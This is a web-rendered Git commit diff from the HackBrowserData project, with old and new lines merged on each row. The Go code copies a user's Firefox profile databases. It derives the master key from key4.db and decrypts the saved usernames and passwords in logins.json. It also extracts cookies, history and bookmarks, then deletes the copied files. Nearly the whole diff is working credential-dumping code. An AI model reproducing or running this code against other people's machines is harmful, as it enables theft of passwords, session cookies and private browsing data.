CalvinBackup/HackBrowserData
1
0
Fork 0
mirror of https://github.com/moonD4rk/HackBrowserData.git synced 2026-05-25 19:17:48 +02:00
Code Issues Packages Projects Releases Wiki Activity

feat: parse cookies, bookmarks and history Closes #9

Browse Source
This commit is contained in:
ᴍᴏᴏɴD4ʀᴋ
2020-07-07 20:27:14 +08:00
parent fc8f965fdd
commit a6fca7c6b3
3 changed files with 145 additions and 33 deletions
Download Patch File Download Diff File Expand all files Collapse all files
cmd/cmd.go
+3 -2
View File
@@ -1,6 +1,7 @@
package cmd package cmd
import ( import (
"fmt"
"hack-browser-data/core" "hack-browser-data/core"
"hack-browser-data/log" "hack-browser-data/log"
"hack-browser-data/utils" "hack-browser-data/utils"
@@ -70,16 +71,16 @@ func Execute() {
core.ParseResult(dst) core.ParseResult(dst)
} }
} else { } else {
fileList := utils.GetDBPath(browserDir, "key4.db", "logins.json", utils.FirefoxCookie) fileList := utils.GetDBPath(browserDir, utils.FirefoxLoginData, utils.FirefoxKey4DB, utils.FirefoxCookie, utils.FirefoxData)
for _, v := range fileList { for _, v := range fileList {
dst := filepath.Base(v) dst := filepath.Base(v)
fmt.Println(dst)
err := utils.CopyDB(v, dst) err := utils.CopyDB(v, dst)
if err != nil { if err != nil {
log.Println(err) log.Println(err)
continue continue
} }
core.ParseResult(dst) core.ParseResult(dst)
core.DecodeKey4()
} }
} }
core/common.go
+124 -26
View File
@@ -12,6 +12,7 @@ import (
"encoding/hex" "encoding/hex"
"hack-browser-data/log" "hack-browser-data/log"
"hack-browser-data/utils" "hack-browser-data/utils"
"io"
"io/ioutil" "io/ioutil"
"os" "os"
"sort" "sort"
@@ -93,6 +94,10 @@ func ParseResult(dbname string) {
parseLogin() parseLogin()
case utils.FirefoxCookie: case utils.FirefoxCookie:
parseFirefoxCookie() parseFirefoxCookie()
case utils.FirefoxKey4DB:
parseFirefoxKey4()
case utils.FirefoxData:
parseFirefoxData()
} }
} }
@@ -299,20 +304,104 @@ func getBookmarkChildren(value gjson.Result) (children gjson.Result) {
return children return children
} }
var queryPassword = `SELECT item1, item2 FROM metaData WHERE id = 'password'` var queryFirefoxBookMarks = `SELECT id, fk, type, dateAdded, title FROM moz_bookmarks`
var queryFirefoxHistory = `SELECT id, url, title, last_visit_date, visit_count FROM moz_places`
func checkKey(key4 string) (b [][]byte) { // places.sqlite doc @https://developer.mozilla.org/en-US/docs/Mozilla/Tech/Places/Database
keyDB, err := sql.Open("sqlite3", key4) func parseFirefoxData() {
var historyList HistorySlice
var (
err error
keyDB *sql.DB
bookmarkRows, historyRow *sql.Rows
tempMap map[int64]string
bookmarkUrl string
)
tempMap = make(map[int64]string)
keyDB, err = sql.Open("sqlite3", utils.FirefoxData)
defer os.Remove(utils.FirefoxData)
defer func() { defer func() {
if err := keyDB.Close(); err != nil { err := keyDB.Close()
log.Println(err) if err != nil {
log.Error(err)
} }
}() }()
if err != nil {
log.Error(err)
}
bookmarkRows, err = keyDB.Query(queryFirefoxBookMarks)
historyRow, err = keyDB.Query(queryFirefoxHistory)
if err != nil {
log.Error(err)
}
defer func() {
if err := bookmarkRows.Close(); err != nil {
log.Error(err)
}
}()
defer func() {
if err := historyRow.Close(); err != nil {
log.Error(err)
}
}()
for historyRow.Next() {
var (
id, visitDate int64
url, title string
visitCount int
)
err = historyRow.Scan(&id, &url, &title, &visitDate, &visitCount)
historyList = append(historyList, history{
Title: title,
Url: url,
VisitCount: visitCount,
LastVisitTime: utils.TimeStampFormat(visitDate / 100000),
})
tempMap[id] = url
}
FullData.HistorySlice = historyList
for bookmarkRows.Next() {
var (
id, fk, bType, dateAdded int64
title string
)
err = bookmarkRows.Scan(&id, &fk, &bType, &dateAdded, &title)
if url, ok := tempMap[id]; ok {
bookmarkUrl = url
}
bookmarkList = append(bookmarkList, bookmarks{
ID: id,
Name: title,
Type: utils.BookMarkType(bType),
URL: bookmarkUrl,
DateAdded: utils.TimeStampFormat(dateAdded / 1000000),
})
}
FullData.BookmarkSlice = bookmarkList
}
var queryPassword = `SELECT item1, item2 FROM metaData WHERE id = 'password'`
func checkKey1() (b [][]byte) {
var (
err error
keyDB *sql.DB
rows *sql.Rows
)
keyDB, err = sql.Open("sqlite3", utils.FirefoxKey4DB)
defer func() {
if err := keyDB.Close(); err != nil {
log.Error(err)
}
}()
if err != nil { if err != nil {
log.Println(err) log.Println(err)
} }
err = keyDB.Ping() err = keyDB.Ping()
rows, err := keyDB.Query(queryPassword) rows, err = keyDB.Query(queryPassword)
defer func() { defer func() {
if err := rows.Close(); err != nil { if err := rows.Close(); err != nil {
log.Println(err) log.Println(err)
@@ -323,26 +412,34 @@ func checkKey(key4 string) (b [][]byte) {
item1, item2 []byte item1, item2 []byte
) )
if err := rows.Scan(&item1, &item2); err != nil { if err := rows.Scan(&item1, &item2); err != nil {
log.Println(err) log.Error(err)
continue
} }
b = append(b, item1, item2) b = append(b, item1, item2)
} }
return b return b
} }
var queryDecode = `SELECT a11, a102 from nssPrivate;` var queryNssPrivate = `SELECT a11, a102 from nssPrivate;`
func checkA102() (b [][]byte) {
keyDB, err := sql.Open("sqlite3", utils.FirefoxKey4DB)
func checkA102(key4 string) (b [][]byte) {
keyDB, err := sql.Open("sqlite3", key4)
defer func() { defer func() {
if err := keyDB.Close(); err != nil { if err := os.Remove(utils.FirefoxKey4DB); err != nil {
log.Println(err) log.Error(err)
} }
}() }()
defer func(closer io.Closer) {
if err := keyDB.Close(); err != nil {
log.Error(err)
}
}(keyDB)
if err != nil { if err != nil {
log.Println(err) log.Error(err)
} }
rows, err := keyDB.Query(queryDecode) rows, err := keyDB.Query(queryNssPrivate)
defer func() { defer func() {
if err := rows.Close(); err != nil { if err := rows.Close(); err != nil {
log.Println(err) log.Println(err)
@@ -357,7 +454,6 @@ func checkA102(key4 string) (b [][]byte) {
} }
b = append(b, a11, a102) b = append(b, a11, a102)
} }
log.Println(b)
return b return b
} }
@@ -414,8 +510,8 @@ func decryptPBE(decodeItem []byte) (pbe PBEAlgorithms) {
return return
} }
func DecodeKey4() { func parseFirefoxKey4() {
h1 := checkKey("key4.db") h1 := checkKey1()
globalSalt := h1[0] globalSalt := h1[0]
decodedItem := h1[1] decodedItem := h1[1]
keyLin := []byte{248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1} keyLin := []byte{248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1}
@@ -424,7 +520,7 @@ func DecodeKey4() {
var finallyKey []byte var finallyKey []byte
if bytes.Contains(m, []byte("password-check")) { if bytes.Contains(m, []byte("password-check")) {
log.Println("password-check success") log.Println("password-check success")
h2 := checkA102("key4.db") h2 := checkA102()
a11 := h2[0] a11 := h2[0]
a102 := h2[1] a102 := h2[1]
m := bytes.Compare(a102, keyLin) m := bytes.Compare(a102, keyLin)
@@ -435,7 +531,7 @@ func DecodeKey4() {
log.Debugf("finally key", finallyKey, hex.EncodeToString(finallyKey)) log.Debugf("finally key", finallyKey, hex.EncodeToString(finallyKey))
} }
} }
allLogins := GetLoginData("logins.json") allLogins := GetLoginData()
for _, v := range allLogins { for _, v := range allLogins {
log.Warn(hex.EncodeToString(v.encryptUser)) log.Warn(hex.EncodeToString(v.encryptUser))
s1 := decryptLogin(v.encryptUser) s1 := decryptLogin(v.encryptUser)
@@ -452,15 +548,17 @@ func DecodeKey4() {
blockMode2 := cipher.NewCBCDecrypter(block, s2.Iv) blockMode2 := cipher.NewCBCDecrypter(block, s2.Iv)
sq2 := make([]byte, len(s2.Encrypted)) sq2 := make([]byte, len(s2.Encrypted))
blockMode2.CryptBlocks(sq2, s2.Encrypted) blockMode2.CryptBlocks(sq2, s2.Encrypted)
u := utils.PKCS7UnPadding(sq)
s := utils.PKCS7UnPadding(sq2)
FullData.LoginDataSlice = append(FullData.LoginDataSlice, loginData{ FullData.LoginDataSlice = append(FullData.LoginDataSlice, loginData{
LoginUrl: v.LoginUrl, LoginUrl: v.LoginUrl,
UserName: string(u), UserName: string(utils.PKCS7UnPadding(sq)),
Password: string(s), Password: string(utils.PKCS7UnPadding(sq2)),
CreateDate: v.CreateDate, CreateDate: v.CreateDate,
}) })
} }
//err := os.Remove("key4.db")
//if err != nil {
// fmt.Println(err)
//}
} }
var queryFirefoxCookie = `SELECT name, value, host, path, creationTime, expiry, isSecure, isHttpOnly FROM moz_cookies` var queryFirefoxCookie = `SELECT name, value, host, path, creationTime, expiry, isSecure, isHttpOnly FROM moz_cookies`
@@ -571,12 +669,12 @@ func paddingZero(s []byte, l int) []byte {
} }
} }
func GetLoginData(loginsJson string) (l []loginData) { func GetLoginData() (l []loginData) {
s, err := ioutil.ReadFile(loginsJson) s, err := ioutil.ReadFile(utils.FirefoxLoginData)
if err != nil { if err != nil {
log.Warn(err) log.Warn(err)
} }
defer os.Remove(loginsJson) defer os.Remove(utils.FirefoxLoginData)
h := gjson.GetBytes(s, "logins") h := gjson.GetBytes(s, "logins")
if h.Exists() { if h.Exists() {
for _, v := range h.Array() { for _, v := range h.Array() {
utils/utils.go
+18 -5
View File
@@ -38,11 +38,15 @@ type Browser struct {
} }
const ( const (
LoginData = "Login Data" LoginData = "Login Data"
History = "History" History = "History"
Cookies = "Cookies" Cookies = "Cookies"
Bookmarks = "Bookmarks" Bookmarks = "Bookmarks"
FirefoxCookie = "cookies.sqlite" FirefoxCookie = "cookies.sqlite"
FirefoxKey4DB = "key4.db"
FirefoxLoginData = "logins.json"
FirefoxData = "places.sqlite"
FirefoxKey3DB = "key3.db"
) )
func ListBrowser() []string { func ListBrowser() []string {
@@ -97,6 +101,15 @@ func IntToBool(a int) bool {
return true return true
} }
func BookMarkType(a int64) string {
switch a {
case 1:
return "url"
default:
return "folder"
}
}
func TimeStampFormat(stamp int64) time.Time { func TimeStampFormat(stamp int64) time.Time {
s1 := time.Unix(stamp, 0) s1 := time.Unix(stamp, 0)
return s1 return s1